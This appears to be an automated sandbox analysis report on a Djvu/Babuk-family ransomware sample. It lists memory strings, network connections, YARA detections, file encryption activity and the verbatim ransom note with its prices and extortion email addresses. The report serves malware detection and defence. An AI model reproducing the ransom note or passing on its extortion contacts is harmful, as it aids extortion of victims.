Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: build2.exe, 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: sIQywRNC5M.exe, 00000005.00000003.2543993505.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542735764.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2546212237.0000000000858000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2545134934.0000000000846000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543898374.0000000000845000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543837357.0000000000858000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000078E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
Source: craw_window.js.5.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: craw_window.js.5.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.5.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.5.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.5.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: craw_window.js.5.dr	String found in binary or memory: https://www.googleapis.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.85.65.125:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

1_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\Users\user\AppData\Local\VirtualStore\_README.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0864PsawqS8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 4220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 1476, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 22.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.sIQywRNC5M.exe.5df15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.sIQywRNC5M.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sIQywRNC5M.exe.5e915a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sIQywRNC5M.exe.5d815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sIQywRNC5M.exe.5dc15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 5896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 3624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 4220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 4160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 2928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 2624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sIQywRNC5M.exe PID: 3808, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File moved: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File deleted: C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File moved: C:\Users\user\Desktop\TQDFJHPUIU.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File deleted: C:\Users\user\Desktop\TQDFJHPUIU.jpg	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File moved: C:\Users\user\Desktop\EIVQSAOTAQ.jpg	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h	Jump to dropped file
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99556232501	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\B3D4LW1M\13\uANxnX_BheDjd2-cdR8N9DEWlds[1].css entropy: 7.99073768179	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{968af3ab-4254-4565-9e34-567f6cbc3cbd}\Apps.ft entropy: 7.99640901678	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\1696426835649.b06d08be-79e8-4bfe-b6aa-988ea3d35cbd.first-shutdown.jsonlz4 entropy: 7.99023662478	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\1696426835647.a83301c6-790b-49f3-adc7-55a855f7fe79.main.jsonlz4 entropy: 7.99020574212	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{968af3ab-4254-4565-9e34-567f6cbc3cbd}\0.0.filtertrie.intermediate.txt entropy: 7.99533508556	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99784719209	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99875437237	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.9902932106	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99784002845	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite entropy: 7.99628883467	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm entropy: 7.99414464859	Jump to dropped file
